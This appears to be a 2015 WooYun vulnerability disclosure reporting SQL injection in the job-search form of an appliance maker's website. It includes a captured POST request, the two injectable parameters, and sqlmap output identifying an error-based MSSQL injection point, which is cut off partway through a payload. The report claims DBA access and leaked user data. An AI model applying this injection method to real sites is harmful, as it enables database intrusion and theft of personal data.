广东万和新电气官网多处SQL注射（DBA权限+泄露用户信息+燃气套餐+各种反馈信息）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153482

漏洞标题：广东万和新电气官网多处SQL注射（DBA权限+泄露用户信息+燃气套餐+各种反馈信息）

漏洞作者：路人甲

提交时间：2015-11-11 10:34

修复时间：2015-12-26 15:02

公开时间：2015-12-26 15:02

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-11：细节已通知厂商并且等待厂商处理中
2015-11-11：厂商已经确认，细节仅向厂商公开
2015-11-21：细节向核心白帽子及相关领域专家公开
2015-12-01：细节向普通白帽子公开
2015-12-11：细节向实习白帽子公开
2015-12-26：细节向公众公开

简要描述：

看了大牛的，凑个热闹！~~~

详细说明：

http://**.**.**.**/HumanResources/SearchJob.aspx
搜索抓包

http://**.**.**.**/HumanResources/SearchJob.aspx (POST)
__VIEWSTATE=/wEPDwUKMTc0NTU5OTYzMw9kFgJmD2QWAmYPZBYCAgMPZBYGAjwPFgIeC18hSXRlbUNvdW50Ag0WGmYPZ
BYEAgEPFgIeBGhyZWYFLX4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MRYCZg8VAQ/nh4PmsJ
Tng63msLTlmahkAgMPFgIfAAIEFghmD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVn
b3J5SWQ9MzIWAmYPFQEWU%2Bezu%2BWIl%2B%2B8iOi2heixquWNju
%2B8iWQCAQ9kFgICAQ8WAh8BBS1%2BL3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTUWAmYPFQET
Reezu%2BWIl%2B%2B8iOixquWNju
%2B8iWQCAg9kFgICAQ8WAh8BBS1%2BL3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTQWAmYPFQET
Q%2Bezu%2BWIl%2B%2B8iOS4ree6p%2B
%2B8iWQCAw9kFgICAQ8WAh8BBS1%2BL3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTMWAmYPFQE
M5bmz6KGh57O75YiXZAIBD2QWBAIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9
MjMWAmYPFQEM55S154Ot5rC05ZmoZAIDDxYCHwACBRYKZg9kFgICAQ8WAh8BBS5%2BL3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xp
c3QuYXNweD9DYXRlZ29yeUlkPTcyFgJmDxUBF%2BmAn
%2BeDrS/nnqzng60g5pm66IO95Z6LZAIBD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0Nhd
GVnb3J5SWQ9MjQWAmYPFQES5Y%2BM6Ziy55S155u
%2B5pm66IO9ZAICD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MjUWA
mYPFQES5Y%2BM6Ziy55S155u
%2B5py65qKwZAIDD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MjYWA
mYPFQEP6Ziy55S16Ze457O75YiXZAIED2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVn
b3J5SWQ9MjcWAmYPFQES5b
%2Br54Ot5byP54Ot5rC05ZmoZAICD2QWBAIBDxYCHwEFLX4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J
5SWQ9ORYCZg8VAQnlo4HmjILngolkAgMPFgIfAAILFhZmD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzd
C5hc3B4P0NhdGVnb3J5SWQ9MTMWAmYPFQEHWeezu
%2BWIl2QCAQ9kFgICAQ8WAh8BBS5%2BL3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTE0FgJmDxUBB
0Xns7vliJdkAgIPZBYCAgEPFgIfAQUufi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZD0xMBYCZg8VAQ
dT57O75YiXZAIDD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MzUWAm
YPFQEHSOezu
%2BWIl2QCBA9kFgICAQ8WAh8BBS5%2BL3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTExFgJmDxUBD0
zns7vliJco5Ya35YedKWQCBQ9kFgICAQ8WAh8BBS5%2BL3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPT
M3FgJmDxUBD1Lns7vliJco5Ya35YedKWQCBg9kFgICAQ8WAh8BBS5%2BL3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9D
YXRlZ29yeUlkPTM4FgJmDxUBEFdI57O75YiXKOWGt
%2BWHnSlkAgcPZBYCAgEPFgIfAQUufi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZD0zNhYCZg8VA
Q9a57O75YiXKOWGt
%2BWHnSlkAggPZBYCAgEPFgIfAQUufi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZD02NhYCZg8VA
RNU57O75YiX77yI5Ya35Yed77yJZAIJD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb
3J5SWQ9NjkWAmYPFQEHQeezu
%2BWIl2QCCg9kFgICAQ8WAh8BBS5%2BL3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTcwFgJmDxUBB
0vns7vliJdkAgMPZBYEAgEPFgIfAQUufi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZD0yOBYCZg8VAR
LlpKrpmLPog73ng63msLTlmahkAgMPFgIfAAICFgRmD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc
3B4P0NhdGVnb3J5SWQ9NDgWAmYPFQEe6Ziz5Y
%2Bw5aOB5oyC5byP5bmz5p2/5aSq6Ziz6IO9ZAIBD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B
4P0NhdGVnb3J5SWQ9NDkWAmYPFQEh5Yir5aKF54Ot5rC05Lit5b
%2BD5bmz5p2/5aSq6Ziz6IO9ZAIED2QWBAIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J
5SWQ9NzMWAmYPFQEKR0FBVOezu
%2BWIl2QCAw8WAh8AAgYWDGYPZBYCAgEPFgIfAQUufi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJ
ZD03NBYCZg8VAQdZ57O75YiXZAIBD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb
3J5SWQ9NzUWAmYPFQEHReezu
%2BWIl2QCAg9kFgICAQ8WAh8BBS5%2BL3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTc2FgJmDxUBB0
jns7vliJdkAgMPZBYCAgEPFgIfAQUufi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZD03NxYCZg8VAQ
dM57O75YiXZAIED2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9NzgWAm
YPFQEHVOezu
%2BWIl2QCBQ9kFgICAQ8WAh8BBS5%2BL3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTc5FgJmDxUBB1
Pns7vliJdkAgUPZBYEAgEPFgIfAQUufi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZD0yORYCZg8VARj
nqbrmsJTmupDng63ms7Xng63msLTlmahkAgMPFgIfAAIEFghmD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVz
TGlzdC5hc3B4P0NhdGVnb3J5SWQ9MzMWAmYPFQEP55S16L6F5LiA5L2T5py6ZAIBD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm
9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MzkWAmYPFQES5rC05b6q546v5YiG5L2T5py6ZAICD2QWAgIBDxYCHwE
FLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9NjgWAmYPFQES5rCf5b6q546v5YiG5L2T5py6ZAI
DD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9NDQWAmYPFQEM5ZWG
55So54Ot5rO1ZAIGD2QWBAIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MzAW
AmYPFQEY6IO95rqQ6ZuG5oiQ54Ot5rC057O757ufZAIDDxYCHwACBRYKZg9kFgICAQ8WAh8BBS5%2BL3Byb2R1Y3QvUHJvZHVjd
FNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTUwFgJmDxUBDOmYs%2BWFieeHg
%2BeDrWQCAQ9kFgICAQ8WAh8BBS5%2BL3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTUxFgJmDxUB
DOmYs
%2BWFieeUteeDrWQCAg9kFgICAQ8WAh8BBS5%2BL3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTgxFg
JmDxUBFeWIq%2BWiheWei%2BmYs
%2BWFieeUteeDrWQCAw9kFgICAQ8WAh8BBS5%2BL3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTUyF
gJmDxUBFeWIq%2BWiheWei%2BmYs%2BWFieeHg
%2BeDrWQCBA9kFgICAQ8WAh8BBS5%2BL3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTgwFgJmDxUB
FeWIq%2BWiheWei%2BmYs
%2BWFieeDreaztWQCBw9kFgQCAQ8WAh8BBS5%2BL3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTE1F
gJmDxUBDOWQuOayueeDn
%2BacumQCAw8WAh8AAgMWBmYPZBYCAgEPFgIfAQUufi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvc
nlJZD0xNhYCZg8VAQbmrKflvI9kAgEPZBYCAgEPFgIfAQUufi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvc
nlJZD0xNxYCZg8VAQbkuK3lvI9kAgIPZBYCAgEPFgIfAQUufi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvc
nlJZD0xOBYCZg8VAQnov5HlkLjlvI9kAggPZBYEAgEPFgIfAQUtfi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZW
dvcnlJZD02FgJmDxUBCeeHg
%2BawlOeBtmQCAw8WAh8AAgIWBGYPZBYCAgEPFgIfAQUtfi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWd
vcnlJZD03FgJmDxUBCeW1jOWFpeW8j2QCAQ9kFgICAQ8WAh8BBS1%2BL3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9D
YXRlZ29yeUlkPTgWAmYPFQEG5Y
%2Bw5byPZAIJD2QWBAIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MTkWAmY
PFQEM5raI5q%2BS56KX5p
%2BcZAIDDxYCHwACAxYGZg9kFgICAQ8WAh8BBS5%2BL3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTI
wFgJmDxUBCeW1jOWFpeW8j2QCAQ9kFgICAQ8WAh8BBS5%2BL3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29
yeUlkPTIxFgJmDxUBBuWNp
%2BW8j2QCAg9kFgICAQ8WAh8BBS5%2BL3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTIyFgJmDxUBBu
eri
%2BW8j2QCCg9kFgQCAQ8WAh8BBS5%2BL3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTU1FgJmDxUB
DOWHgOawtOiuvuWkh2QCAw8WAh8AZmQCCw9kFgQCAQ8WAh8BBS5%2BL3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNwe
D9DYXRlZ29yeUlkPTU2FgJmDxUBD%2BWFtuWug%2BWwj
%2BWutueUtWQCAw8WAh8AZmQCDA9kFgQCAQ8WAh8BBS5%2BL3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ
29yeUlkPTgyFgJmDxUBCeeUteeDpOeusWQCAw8WAh8AZmQCVA8WAh8AAggWEGYPZBYCZg8VAwExATMG5qW855uYZAIBD2
QWAmYPFQMBMQExBumFkuW6l2QCAg9kFgJmDxUDATECNDkb5bel5Lia5LyB5Lia5Y
%2BK5bel5Lia5Zut5Yy6ZAIDD2QWAmYPFQMBMQMxMDIM6YeH5pqW5bel56iLZAIED2QWAmYPFQMBMQEyBuWtpuagoWQCB
Q9kFgJmDxUDATEBNQNCT1RkAgYPZBYCZg8VAwExATQG5Yy76ZmiZAIHD2QWAmYPFQMBMQI5MxLlhbblroPlhazlhbHlu7rnrZF
kAogBD2QWAgIDD2QWAgIDDzwrAAkBAA8WBB4IRGF0YUtleXMWAB8AZmRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZ
XlfXxYCBRhjdGwwMCRjdGwwMCRpbWdCdG5TZWFyY2gFQmN0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVud
FBsYWNlSG9sZGVyMV8xJFJhZGlvQnV0dG9uMSr4AhLdKSfuuynf2bvUCGQ7ryPM&__VIEWSTATEGENERATOR=A8C87D47&__EVE
NTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWJQLd75TGBgLp4ai0CgLNpdNCAoDGjNoPAqD0o48BAvugpJw
MAv/Zn5QCArHDg8MOAsqLk%2BgPAuCcwScCxITh%2BAMCr7/U
%2BAMCt/Cwwg8CmcCeuQEC4%2BeeuQEC4%2Bfq3Q4CmP71ugECk83H2AoCtMzIvA8CvaPi0gMCu6OS0QMCuaOi0QMCvqOi0
QMC4sjtoAEC69PCtAYCvcjo3wIC9putiQkCz/SzngMCiNf8hwQCiaOq6wIC58vilwgC7I3BwwICrLuYmw0CtPrDhAECpt7vpA8C
%2BYyv8gICgYjTrgkmSfoABjx3ctbSuPmqwSlgunvSEg%3D
%3D&ctl00$ctl00$search=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1_1$departments=
%E8%90%A5%E9%94%80&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1_1$education=%E5%8D%9A%E5%A3%AB
%E7%A0%94%E7%A9%B6%E7%94%9F&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1_1$releaseDate=7&ctl00$ctl00$
ContentPlaceHolder1$ContentPlaceHolder1_1$experience=%E5%BA%94%E5%B1%8A%E6%AF%95%E4%B8%9A
%E7%94%9F&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1_1$requirements=1&ctl00$ctl00$ContentPlaceHolder1$Co
ntentPlaceHolder1_1$professional=3&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1_1$jobname=4&ctl00$ctl00$Cont
entPlaceHolder1$ContentPlaceHolder1_1$RadioButton1=RadioButton1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder
1_1$jobSearch=%E6%90%9C   %E7%B4%A2

多处存在注入，ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1_1$requirements和
ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1_1$jobname两个参数存在注入。
直接sqlmap测试吧！~~~

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder1_1$jobname
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: 
__VIEWSTATE=/wEPDwUKMTc0NTU5OTYzMw9kFgJmD2QWAmYPZBYCAgMPZBYGAjwPFgIeC18hSXRlbUNvdW50Ag0WGmYPZ
BYEAgEPFgIeBGhyZWYFLX4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MRYCZg8VAQ/nh4PmsJ
Tng63msLTlmahkAgMPFgIfAAIEFghmD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVn
b3J5SWQ9MzIWAmYPFQEWU ezu WIl  8iOi2heixquWNju 8iWQCAQ9kFgICAQ8WAh8BBS1 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTUWAmYPFQETReezu WIl  8iOixquWNju 
8iWQCAg9kFgICAQ8WAh8BBS1 L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTQWAmYPFQETQ ezu 
WIl  8iOS4ree6p  8iWQCAw9kFgICAQ8WAh8BBS1 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTMWAmYPFQEM5bmz6KGh57O75YiXZAIBD2QWBAIBDxY
CHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MjMWAmYPFQEM55S154Ot5rC05ZmoZAI
DDxYCHwACBRYKZg9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTcyFgJmDxUBF mAn 
eDrS/nnqzng60g5pm66IO95Z6LZAIBD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb
3J5SWQ9MjQWAmYPFQES5Y M6Ziy55S155u 
5pm66IO9ZAICD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MjUWAmYP
FQES5Y M6Ziy55S155u 
5py65qKwZAIDD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MjYWAmYP
FQEP6Ziy55S16Ze457O75YiXZAIED2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5
SWQ9MjcWAmYPFQES5b 
r54Ot5byP54Ot5rC05ZmoZAICD2QWBAIBDxYCHwEFLX4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5S
WQ9ORYCZg8VAQnlo4HmjILngolkAgMPFgIfAAILFhZmD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5
hc3B4P0NhdGVnb3J5SWQ9MTMWAmYPFQEHWeezu WIl2QCAQ9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTE0FgJmDxUBB0Xns7vliJdkAgIPZBYCAgEPFgIfAQUufi9wc
m9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZD0xMBYCZg8VAQdT57O75YiXZAIDD2QWAgIBDxYCHwEFLn
4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MzUWAmYPFQEHSOezu 
WIl2QCBA9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTExFgJmDxUBD0zns7vliJco5Ya35YedKWQCBQ9kFgICAQ8
WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTM3FgJmDxUBD1Lns7vliJco5Ya35YedKWQCBg9kFgICAQ8
WAh8BBS5 L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTM4FgJmDxUBEFdI57O75YiXKOWGt 
WHnSlkAgcPZBYCAgEPFgIfAQUufi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZD0zNhYCZg8VAQ9a5
7O75YiXKOWGt 
WHnSlkAggPZBYCAgEPFgIfAQUufi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZD02NhYCZg8VARNU
57O75YiX77yI5Ya35Yed77yJZAIJD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5S
WQ9NjkWAmYPFQEHQeezu WIl2QCCg9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTcwFgJmDxUBB0vns7vliJdkAgMPZBYEAgEPFgIfAQUufi9w
cm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZD0yOBYCZg8VARLlpKrpmLPog73ng63msLTlmahkAgMPFgI
fAAICFgRmD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9NDgWAmYPFQ
Ee6Ziz5Y 
w5aOB5oyC5byP5bmz5p2/5aSq6Ziz6IO9ZAIBD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0
NhdGVnb3J5SWQ9NDkWAmYPFQEh5Yir5aKF54Ot5rC05Lit5b 
D5bmz5p2/5aSq6Ziz6IO9ZAIED2QWBAIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SW
Q9NzMWAmYPFQEKR0FBVOezu 
WIl2QCAw8WAh8AAgYWDGYPZBYCAgEPFgIfAQUufi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZD0
3NBYCZg8VAQdZ57O75YiXZAIBD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5S
WQ9NzUWAmYPFQEHReezu WIl2QCAg9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTc2FgJmDxUBB0jns7vliJdkAgMPZBYCAgEPFgIfAQUufi9wc
m9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZD03NxYCZg8VAQdM57O75YiXZAIED2QWAgIBDxYCHwEFLn
4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9NzgWAmYPFQEHVOezu 
WIl2QCBQ9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTc5FgJmDxUBB1Pns7vliJdkAgUPZBYEAgEPFgIfAQUufi9wc
m9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZD0yORYCZg8VARjnqbrmsJTmupDng63ms7Xng63msLTlmah
kAgMPFgIfAAIEFghmD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MzM
WAmYPFQEP55S16L6F5LiA5L2T5py6ZAIBD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0Nhd
GVnb3J5SWQ9MzkWAmYPFQES5rC05b6q546v5YiG5L2T5py6ZAICD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaW
VzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9NjgWAmYPFQES5rCf5b6q546v5YiG5L2T5py6ZAIDD2QWAgIBDxYCHwEFLn4vcHJvZHVjdC
9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9NDQWAmYPFQEM5ZWG55So54Ot5rO1ZAIGD2QWBAIBDxYCHwE
FLn4vcHJvZHVjdC9Qcm9kdWN0U2VyaWVzTGlzdC5hc3B4P0NhdGVnb3J5SWQ9MzAWAmYPFQEY6IO95rqQ6ZuG5oiQ54Ot5rC05
7O757ufZAIDDxYCHwACBRYKZg9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTUwFgJmDxUBDOmYs WFieeHg 
eDrWQCAQ9kFgICAQ8WAh8BBS5 L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTUxFgJmDxUBDOmYs 
WFieeUteeDrWQCAg9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTgxFgJmDxUBFeWIq WiheWei mYs 
WFieeUteeDrWQCAw9kFgICAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTUyFgJmDxUBFeWIq WiheWei mYs WFieeHg 
eDrWQCBA9kFgICAQ8WAh8BBS5 L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTgwFgJmDxUBFeWIq 
WiheWei mYs WFieeDreaztWQCBw9kFgQCAQ8WAh8BBS5 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTE1FgJmDxUBDOWQuOayueeDn 
acumQCAw8WAh8AAgMWBmYPZBYCAgEPFgIfAQUufi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZ
D0xNhYCZg8VAQbmrKflvI9kAgEPZBYCAgEPFgIfAQUufi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZ
D0xNxYCZg8VAQbkuK3lvI9kAgIPZBYCAgEPFgIfAQUufi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJZ
D0xOBYCZg8VAQnov5HlkLjlvI9kAggPZBYEAgEPFgIfAQUtfi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcn
lJZD02FgJmDxUBCeeHg 
awlOeBtmQCAw8WAh8AAgIWBGYPZBYCAgEPFgIfAQUtfi9wcm9kdWN0L1Byb2R1Y3RTZXJpZXNMaXN0LmFzcHg/Q2F0ZWdvcnlJ
ZD03FgJmDxUBCeW1jOWFpeW8j2QCAQ9kFgICAQ8WAh8BBS1 
L3Byb2R1Y3QvUHJvZHVjdFNlcmllc0xpc3QuYXNweD9DYXRlZ29yeUlkPTgWAmYPFQEG5Y 
